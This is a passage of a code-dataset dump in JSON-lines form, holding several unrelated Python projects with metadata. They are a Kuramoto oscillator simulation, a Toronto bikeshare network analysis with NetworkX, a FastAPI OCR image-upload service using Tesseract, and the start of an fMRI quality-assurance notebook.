"usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.display.Info", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.draw.lines", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.draw.lines", "line_number": 82, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 83, "usage_type": "attribute"}, 
{"api_name": "pygame.draw.polygon", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.draw.aalines", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.draw.aalines", "line_number": 88, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.draw.aalines", "line_number": 90, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 104, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 105, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 106, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 106, "usage_type": "attribute"}]} +{"seq_id": "33563734214", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 20 12:54:50 2019\n\n@author: mpanaggio\n\"\"\"\n\n\nimport learn_kuramoto_files as lk\nimport numpy as np\nimport importlib as imp\nimport pandas as pd\nimport time\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nimp.reload(lk)\n\n##############################################################################\n## define model parameters\nnum_osc=10\nmu_freq=0.0 # mean natural frequency\nsigma_freq=0.01 # std natural frequency\np_erdos_renyi=0.9 # probability of connection for erdos renyi\nrandom_seed=-1 # -1 to ignore\ncoupling_function=lambda x: np.sin(x)#+0.1*np.sin(2*(x+0.2)) # Gamma from kuramoto model\n#coupling_function=lambda x: np.sin(x-0.2)+0.1*np.cos(2*x) # Gamma from kuramoto model\n\n##############################################################################\n## define numerical solution parameters\ndt=0.1 # time step for numerical solution\ntmax=1000*dt # maximum time for numerical solution\nnoise_level=0.0 # post solution noise added\ndynamic_noise_level=0.00 # post solution noise added\nnum_repeats=1#10 # number of restarts for numerical solution\nnum_attempts=1#5 # number of times to attempt to learn from data for each network\nnum_networks=1#10 # number of different networks for each parameter value\nmethod='euler' #'rk2','rk4','euler',\nwith_vel=False\n## Note: the loop parameter value will overwrite the value above\n\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nfor network in range(1,num_networks+1):\n## create parameter dictionaries\n system_params={'w': lk.random_natural_frequencies(num_osc,mu=mu_freq,sigma=sigma_freq,seed=random_seed),\n 'A': lk.random_erdos_renyi_network(num_osc,p_value=p_erdos_renyi,seed=random_seed),\n 'K': 1.0,\n 'Gamma': coupling_function,\n 'other': str(parameter),\n #'IC': np.random.rand(num_osc)*np.pi*2, # fixed initial condition for each repeat\n 'IC': {'type': 'reset', # reset (set phase to 0) or random\n 'selection': 
'fixed', #fixed or random\n                          'num2perturb': 1, # integer used only when selection is random\n                          'indices': [0], # list of integers, used only when selection='fixed' \n                          'size': 2, # float, used only when type='random'\n                          'IC': 0*np.random.rand(num_osc)*np.pi*2} # initial condition for first repeat\n                   }\n    \n    solution_params={'dt':dt,\n                     'tmax':tmax,\n                     'noise': noise_level,\n                     'dynamic noise': dynamic_noise_level,\n                     'ts_skip': 1, # don't skip timesteps\n                     'num_repeats': num_repeats\n                     }\n    \n    learning_params={'learning_rate': 0.005,\n                     'n_epochs': 300, #400\n                     'batch_size':500,#500,\n                     'n_oscillators':num_osc,\n                     'dt': dt,\n                     'n_coefficients': 20,\n                     'reg':0.0001,\n                     'prediction_method': method,\n                     'velocity_fit': with_vel\n                     }\n    t=np.arange(0,tmax,dt)[:-1].reshape(-1,1)\n    phases,vel=lk.generate_data_vel(system_params,solution_params)\n    n_ts=t.shape[0]\n    \n    \n    figsize=(12,4)\n    fontsize=16\n    plt.figure(figsize=figsize) \n    for rep in range(num_repeats):\n        \n        cur_t=t+rep*tmax\n        cur_phases=phases[rep*n_ts:(rep+1)*n_ts]\n        #lk.plot_ode_results(t,phases[rep*n_ts:(rep+1)*n_ts],figsize=(20,5),fontsize=16)\n        R,Psi=lk.get_op(cur_phases)\n        plt.subplot(1,3,1)\n        plt.plot(cur_t,cur_phases)\n        plt.title('Phases',fontsize=fontsize)\n        plt.xlabel('time',fontsize=fontsize)\n        plt.ylabel('phases',fontsize=fontsize)\n        plt.subplot(1,3,2)\n        plt.plot(cur_t,R,'b')\n        plt.title('Order parameter',fontsize=fontsize)\n        plt.xlabel('time',fontsize=fontsize)\n        plt.ylabel('R(t)=|Z(t)|',fontsize=fontsize)\n        plt.ylim(0,1.1)\n        plt.subplot(1,3,3)\n        plt.plot(cur_t,Psi,'b')\n        plt.title('Order parameter',fontsize=fontsize)\n        plt.xlabel('time',fontsize=fontsize)\n        plt.ylabel(r'$\\Psi(t)=arg(Z(t))$',fontsize=fontsize)\n        plt.ylim(-np.pi,np.pi)\n        if rep>=1:\n            for subplot in range(1,4):\n                ax=plt.subplot(1,3,subplot)\n                ylim=ax.get_ylim()\n                ax.axvline(x=rep*tmax,ymin=ylim[0],ymax=ylim[1],color='k',linestyle='--')\n    plt.show()\n", "repo_name": "mpanaggio/coupled_oscillator_network_model_reconstruction", "sub_path": "test_data_generation.py", "file_name": "test_data_generation.py", "file_ext": "py", "file_size_in_byte": 4489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "importlib.reload", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 25, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 43, "usage_type": "call"}, {"api_name": "learn_kuramoto_files.random_natural_frequencies", "line_number": 47, "usage_type": "call"}, {"api_name": "learn_kuramoto_files.random_erdos_renyi_network", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 79, "usage_type": "call"}, {"api_name": "learn_kuramoto_files.generate_data_vel", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "learn_kuramoto_files.get_op", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 94, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 109, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}]} +{"seq_id": "59773328", "text": "#PROJECT: MODELING TORONTO BIKESHARE NETWORK\r\n\r\n#Notes: \r\n\r\n#station info JSON: https://tor.publicbikesystem.net/ube/gbfs/v1/en/station_information\r\n\r\n#--------------------------------------------------#\r\n\r\n#1) IMPORT LIBRARIES\r\n\r\n#Computation and Structuring:\r\n\r\nimport pandas as pd\r\nimport json\r\nfrom pandas.io.json import json_normalize\r\n\r\n#Modeling:\r\n\r\nimport networkx as nx\r\n\r\n#Visualization:\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n#--------------------------------------------------#\r\n\r\n#1) DATA IMPORT AND PREP\r\n\r\n#First we load the node data from a JSON file containing all of the station's in the 
Toronto bike network:\r\n\r\n#The JSON was in a deep embedded format and not working with Pandas read_json, so needed to take a more manual approach (i.e. can't use pd.read_json):\r\n\r\ndef unpack_json(filename):\r\n    \"\"\"function to unpack the JSON file format provided by the Toronto bikeshare network \"\"\"\r\n    \r\n    with open(filename) as json_file: \r\n        inter_data = json.load(json_file)\r\n    \r\n    inter_data = json_normalize(inter_data['data'])\r\n    inter_data = list(inter_data.values.flatten()) #creates a list of a list of dictionaries\r\n    inter_data = inter_data[0] #unpacks so it is a list of dictionaries since all the data was in a list object at index[0]\r\n    inter_data_df = pd.DataFrame(inter_data) #convert the list of dictionaries into a df, which is now properly formatted\r\n    \r\n    return inter_data_df\r\n\r\nnode_data_function = unpack_json('station_info.json') #gets information on stations and locations\r\nnode_data_final = node_data_function[['address','capacity','lat','lon','name','station_id']] #only keep relevant columns, this is our final cleaned node data set we can use to build the graph\r\n\r\n#Now we load the edge data, which consists of an excel file with ride level data:\r\n\r\nedge_data = pd.read_excel('2016_Bike_Share_Toronto_Ridership_Q4.xlsx')\r\n\r\n#clean edge data and join to station id information from the node_data file:\r\n\r\ndef clean_edge_data(df1, df2):\r\n    \"\"\"cleans and reformats the edge data set so that node information is included\"\"\"\r\n    \r\n    edge_data_final = pd.merge(df1,df2[['name','station_id']].rename(columns={'name':'from_station_name'}),how='left',on='from_station_name') #add station_id from the node data to the trip level data \r\n    edge_data_final = edge_data_final.rename(columns={'station_id':'station_id_from'}) #rename station_id column\r\n    edge_data_final = pd.merge(edge_data_final,df2[['name','station_id']].rename(columns={'name':'to_station_name'}),how='left',on='to_station_name') #add station_id from the node data to the trip level data \r\n    edge_data_final = edge_data_final.rename(columns={'station_id':'station_id_to'}) #rename station_id column\r\n    edge_data_final = edge_data_final.dropna(subset=['station_id_to', 'station_id_from']) #drops edges where station id info is missing\r\n    edge_data_final['station_id_from'] = pd.to_numeric(edge_data_final['station_id_from'], downcast='integer') #match to format of station_id in node data set\r\n    edge_data_final['station_id_to'] = pd.to_numeric(edge_data_final['station_id_to'], downcast='integer') #match to format of station_id in node data set\r\n    \r\n    return edge_data_final\r\n\r\nedge_data_final2 = clean_edge_data(edge_data, node_data_final) #creates final cleaned edge data set ready for creating the network\r\n\r\n#--------------------------------------------------#\r\n\r\n#3) Structure the Bikeshare network as a NetworkX Graph:\r\n\r\nNG = nx.MultiDiGraph() #creates empty directed graph\r\n\r\n#create nodes in the graph from station_id and give them a position that is equal to their lat-lon coordinates\r\n\r\nfor i, j, k in zip(node_data_final['station_id'], node_data_final['lon'], node_data_final['lat']):\r\n    NG.add_node(i,pos=(j,k)) #iterates through the node data file and adds each station as a node\r\n\r\npos= nx.get_node_attributes(NG, 'pos') #set position attribute for drawing\r\nprint(pos) #check the dictionary format is correct\r\n\r\n#loop through the edge pairs and add to graph:\r\nfor i, j in zip(edge_data_final2['station_id_from'], edge_data_final2['station_id_to']):\r\n    NG.add_edge(i,j) 
#iterates through edge_data and adds edges to the graph\r\n    \r\n#--------------------------------------------------#\r\n\r\n#4) Analysis and Visualization: \r\n    \r\n#Some high level stats for the network:\r\n    \r\nprint('# of edges: {}'.format(NG.number_of_edges())) #~147k\r\nprint('# of nodes: {}'.format(NG.number_of_nodes())) #336 nodes, matches number of stations\r\nprint(NG.degree(node_data_final['station_id'])) #look at most important nodes in network\r\nprint(nx.in_degree_centrality(NG)) #computes the in-degree centrality for nodes in the directed network\r\nprint(nx.out_degree_centrality(NG)) #computes the out-degree centrality for nodes in the directed network\r\n\r\n#visualization of the network in physical space (using the lat-lon coordinate attributes):\r\n\r\nplt.axis('off')\r\nnx.draw(NG,pos,node_size=20,node_color='blue',alpha=0.5,width=0.5)\r\n\r\n\r\n", "repo_name": "7cb15/Modeling-Toronto-Bikeshare-Network", "sub_path": "BikeShareModeling.py", "file_name": "BikeShareModeling.py", "file_ext": "py", "file_size_in_byte": 4953, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.load", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.io.json.json_normalize", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 60, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 64, "usage_type": "call"}, {"api_name": "networkx.MultiDiGraph", "line_number": 74, "usage_type": "call"}, {"api_name": "networkx.get_node_attributes", "line_number": 81, "usage_type": "call"}, {"api_name": "networkx.in_degree_centrality", "line_number": 97, "usage_type": "call"}, {"api_name": "networkx.out_degree_centrality", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "networkx.draw", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "20752848565", "text": "from functools import lru_cache\nfrom fastapi import FastAPI, UploadFile, File, Depends, HTTPException\nfrom fastapi import responses\nfrom fastapi.responses import FileResponse, JSONResponse\nfrom typing import List, Optional\nimport pytesseract\nimport pathlib\nfrom os import getcwd\nimport os\nimport io\nimport uuid\nimport shutil\nfrom PIL import Image\nimport sys\nimport logging\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom pydantic import BaseSettings, BaseModel\nfrom random import randint\n\napp = FastAPI()\n\norigins = [\n    \"http://localhost:3000\",\n]\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=origins,\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n)\n\npytesseract.pytesseract.tesseract_cmd ='C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\n\n\nBASE_DIR = pathlib.Path(__file__).parent\nUPLOAD_DIR = BASE_DIR / \"uploads\"\n\nclass Settings(BaseSettings):\n    debug: bool = False\n    echo_active: bool = False\n\n    class Config:\n        env_file = \".env\"\n\nclass PredictionResponse(BaseModel):\n    filename: str\n    contentype: Optional[str] = None \n    likely_class: Optional[str] = 
None\n\n@lru_cache\ndef get_settings():\n    return Settings()\n\nsettings = get_settings()\nDEBUG = settings.debug\n\nprint(DEBUG)\n\n@app.post(\"/upload\", response_class=FileResponse, responses={200: {\"Description\": \"Uploading Images\"}})\nasync def upload_file(file: UploadFile = File(...), settings: Settings=Depends(get_settings)):\n    if not settings.echo_active:\n        raise HTTPException(detail=\"Invalid endpoint\", status_code=400)\n    UPLOAD_DIR.mkdir(exist_ok=True)\n    bytes_str = io.BytesIO(await file.read())\n    #img = Image.open(bytes_str) #opencv can be used here, also called cv2\n    try:\n        img = Image.open(bytes_str)\n    except:\n        raise HTTPException(detail=\"Invalid image\", status_code=400)\n    fname = pathlib.Path(file.filename)\n    fext = fname.suffix # .jpg, .txt\n    dest = UPLOAD_DIR / f\"{file.filename}\"\n    # {uuid.uuid1()}{fext}\n    with open(str(dest), 'wb') as out:\n        out.write(bytes_str.getvalue())\n    img.save(dest)\n    print(settings.debug)\n    return dest\n\n@app.post(\"/predictions\") # http POST\nasync def prediction_view(file:UploadFile = File(...), settings:Settings = Depends(get_settings)):\n    \n    try:\n        contents = await file.read()\n        image = Image.open(io.BytesIO(contents)).convert('RGB')\n\n        predicted_class = pytesseract.image_to_string(image)\n        predictions = [x for x in predicted_class.split(\"\\n\")]\n        \n        logging.info(f\"Predicted Class: {predictions}\")\n\n        # --\n\n        bytes_str = io.BytesIO(contents)\n        try:\n            img = Image.open(bytes_str)\n        except:\n            raise HTTPException(detail=\"Invalid image\", status_code=400)\n        \n        try:\n            img.save(getcwd() + f\"/images/{file.filename}\")\n        except FileExistsError:\n            pass\n\n        # --\n\n        # Save to file\n        \n        try:\n            my_file_location = getcwd() + f\"/images/{file.filename}.txt\"\n            my_file = open(my_file_location, \"w\")\n\n            print(\"begin write\")\n\n            for text in predictions:\n                my_file.write(f\"{str(text)}\\n\")\n\n            print(\"END WRITE\")\n            my_file.close()\n            print(\"close success\")\n\n        except Exception as e:\n            print(\"error\", e)\n        \n        # ---\n\n\n        return {\n            \"filename\": file.filename, \n            \"contentype\": file.content_type, \n            \"likely_class\": predictions,\n            \"text_link\": f\"http://127.0.0.1:8000/file/{file.filename}.txt\",\n            \"link\": f\"http://127.0.0.1:8000/file/{file.filename}\"\n        }\n    except Exception as error:\n        logging.exception(error)\n        e = sys.exc_info()[1]\n        raise HTTPException(status_code=500, detail=str(e))\n\n\n@app.post(\"/predict/\", response_model=PredictionResponse)\nasync def predict(file: UploadFile = File(...)): \n    # if file.content_type.startswith('/images/') is False:\n    #     raise HTTPException(status_code=400, detail=f'File \\'{file.filename}\\' is not an image.') \n\n    try:\n        contents = await file.read()\n        image = Image.open(io.BytesIO(contents)).convert('RGB')\n\n        predicted_class = pytesseract.image_to_string(image)\n        predictions = [x for x in predicted_class.split(\"\\n\")]\n        \n        logging.info(f\"Predicted Class: {predictions}\")\n        return {\n            \"filename\": file.filename, \n            \"contentype\": file.content_type, \n            \"likely_class\": predicted_class,\n        }\n    except Exception as error:\n        logging.exception(error)\n        e = sys.exc_info()[1]\n        raise HTTPException(status_code=500, detail=str(e))\n\n@app.post(\"/uploads\")\nasync def upload_files(file: UploadFile = File(...)):\n    with open(file.filename, 'wb') as image:\n        content = await file.read()\n        image.write(content)\n        image.close()\n    return JSONResponse(content={\"filename\": file.filename},\nstatus_code=200)\n\n@app.post(\"/img\")\nasync def upload_img(files: List[UploadFile] = File(...)):\n    # 
UPLOAD_DIR.mkdir(exist_ok=True)\n    for img in files:\n        with open(f'{img.filename}', \"wb\") as buffer:\n            shutil.copyfileobj(img.file, buffer)\n\n    return {\"file_name\" : \"Images Uploaded\"}\n\n@app.post(\"/upload-file/\")\nasync def create_upload_file(uploaded_file: UploadFile = File(...)):\n    print(\"execute\")\n\n    file_location = f\"images/{uploaded_file.filename}\"\n    with open(file_location, \"wb+\") as file_object:\n        shutil.copyfileobj(uploaded_file.file, file_object)    \n    return {\"info\": f\"file '{uploaded_file.filename}' saved at '{file_location}'\",\n            \"link\": f\"http://127.0.0.1:8000/file/{uploaded_file.filename}\" }\n\n@app.get(\"/images/\")\nasync def read_random_file():\n\n    # get a random file from the image directory\n    files = os.listdir(UPLOAD_DIR)\n    random_index = randint(0, len(files) - 1)\n\n    path = f\"{UPLOAD_DIR}/{files[random_index]}\"\n    \n    # notice you can use FileResponse now because it expects a path\n    return FileResponse(path)\n\n@app.get(\"/file/{name_file}\")\ndef get_file(name_file: str):\n    return FileResponse(path=getcwd() + \"/images/\" + name_file)\n\n\n\"\"\"\n@app.post(\"/test/\")\nasync def get_file(uploaded_file: UploadFile = File(...)):\n    print(\"receive\", uploaded_file.filename)\n    return JSONResponse({\"state\": \"success\"})\n\"\"\"\n", "repo_name": "Angelvicks/vision-ai", "sub_path": "Backend/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 6404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.FastAPI", "line_number": 20, "usage_type": "call"}, {"api_name": "fastapi.middleware.cors.CORSMiddleware", "line_number": 26, "usage_type": "argument"}, {"api_name": "pytesseract.pytesseract", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 36, "usage_type": "call"}, {"api_name": "pydantic.BaseSettings", "line_number": 39, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "functools.lru_cache", "line_number": 51, "usage_type": "name"}, {"api_name": "fastapi.UploadFile", "line_number": 61, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 61, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 61, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 63, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 65, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 68, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 70, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 71, "usage_type": "call"}, {"api_name": "fastapi.responses.FileResponse", "line_number": 60, "usage_type": "name"}, {"api_name": "fastapi.UploadFile", "line_number": 82, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 82, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 82, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 86, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 86, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 86, "usage_type": "call"}, {"api_name": "pytesseract.image_to_string", "line_number": 88, "usage_type": "call"}, {"api_name": 
"logging.info", "line_number": 91, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 95, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 97, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 97, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 99, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 102, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 111, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 137, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 138, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 139, "usage_type": "call"}, {"api_name": "fastapi.UploadFile", "line_number": 143, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 143, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 149, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 149, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 149, "usage_type": "call"}, {"api_name": "pytesseract.image_to_string", "line_number": 151, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 154, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 161, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 162, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 163, "usage_type": "call"}, {"api_name": "fastapi.UploadFile", "line_number": 166, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 166, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 171, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 175, "usage_type": "name"}, {"api_name": "fastapi.UploadFile", "line_number": 175, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 175, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 179, "usage_type": "call"}, {"api_name": "fastapi.UploadFile", "line_number": 184, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 184, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 189, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 197, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 198, "usage_type": "call"}, {"api_name": "fastapi.responses.FileResponse", "line_number": 203, "usage_type": "call"}, {"api_name": "fastapi.responses.FileResponse", "line_number": 207, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 207, "usage_type": "call"}]} +{"seq_id": "8545020554", "text": "# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.9.1\n# kernelspec:\n# display_name: hcp7t_fv_sleep_env\n# language: python\n# name: hcp7t_fv_sleep_env\n# ---\n\n# # Data Quality Assurance - Part 1\n#\n# This notebook will perform the following steps:\n#\n# 1. Load a list of subjects of interest (i.e., those with at least one resting-state scan at 7T)\n# 2. Load motion estimates and compute Framewise Displacement (saves FD to disk on each run folder)\n# 3. Attempt loading of ET files for each run (and mark those that are defective)\n# 4. 
Construct a dataframe with the following information per run: correct TR, correct spatial resolution, correct number of volumes, ET available, ET can be loaded\n#\n# A summary of this QA is saved to disk in ${RESOURCES_DIR}/QA_Part1_Results.pkl\n# ***\n\n# +\n# %%time\nfrom utils.basics import get_7t_subjects, load_motion_info\nfrom utils.variables import RUNS, DATA_DIR, ProjectFiles_DF_Path, QA1_Results_DF_Path\nfrom utils.ParseEyeLinkAsc import ParseEyeLinkAsc\n\nimport numpy as np\nimport pandas as pd\nimport os.path as osp\nimport nibabel as nib\n\nVERBOSE=False\n# -\n\n# *** \n# ## 1. Check the Dataframe with information about available files\n\nProjectFiles_DF = pd.read_pickle(ProjectFiles_DF_Path)\nprint('++ INFO: Shape of ProjectFiles_DF is %s' % str(ProjectFiles_DF.shape))\n\nprint('++ INFO: Number of Runs with ET(asc) file available: %d Runs' % (ProjectFiles_DF.shape[0] - ProjectFiles_DF['ET_ASC'].isna().sum()))\nprint('++ INFO: Number of Runs with ET(csv) file available: %d Runs' % (ProjectFiles_DF.shape[0] - ProjectFiles_DF['ET_CSV'].isna().sum()))\n\n# ***\n# ## 2. Load List of Subjects of interest\n\n# Load List of Subjects with at least one resting-state scan\nsbjs = get_7t_subjects()\nprint('++ Number of available subjects: %d' % len(sbjs))\n\n# ***\n# ## 3. Load Motion Information and Compute Framewise Displacement\n# This will generate a file per run with the traces of framewise displacement for that particular run\n\n# %%time\n# Load Motion Information for all subjects available and create FD data frame for each run\nmot_df = load_motion_info(sbjs, write_FD=True, fillnan=False, verbose=VERBOSE)\n\nprint('++ INFO: Shape of mot_df is %s' % str(mot_df.shape))\nmot_df.head()\n
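The FD computation itself lives inside `load_motion_info`; for readers who want the formula, here is a minimal sketch of Power-style framewise displacement. The (N, 6) column layout (translations in mm, then rotations in degrees) and the 50 mm head radius are assumptions, not something this notebook asserts:

import numpy as np

def framewise_displacement(motion, head_radius_mm=50.0):
    """Power et al. FD: sum of absolute backward differences of the six
    rigid-body parameters, with rotations converted to mm of arc.

    motion: (N, 6) array, columns 0-2 translations [mm], 3-5 rotations [deg].
    (Column order is an assumption; HCP Movement_Regressors.txt also stores
    parameter derivatives in columns 6-11, which are ignored here.)
    """
    motion = np.asarray(motion, dtype=float)
    trans = motion[:, 0:3]
    rot_mm = np.deg2rad(motion[:, 3:6]) * head_radius_mm  # deg -> mm of arc
    deltas = np.abs(np.diff(np.hstack([trans, rot_mm]), axis=0))
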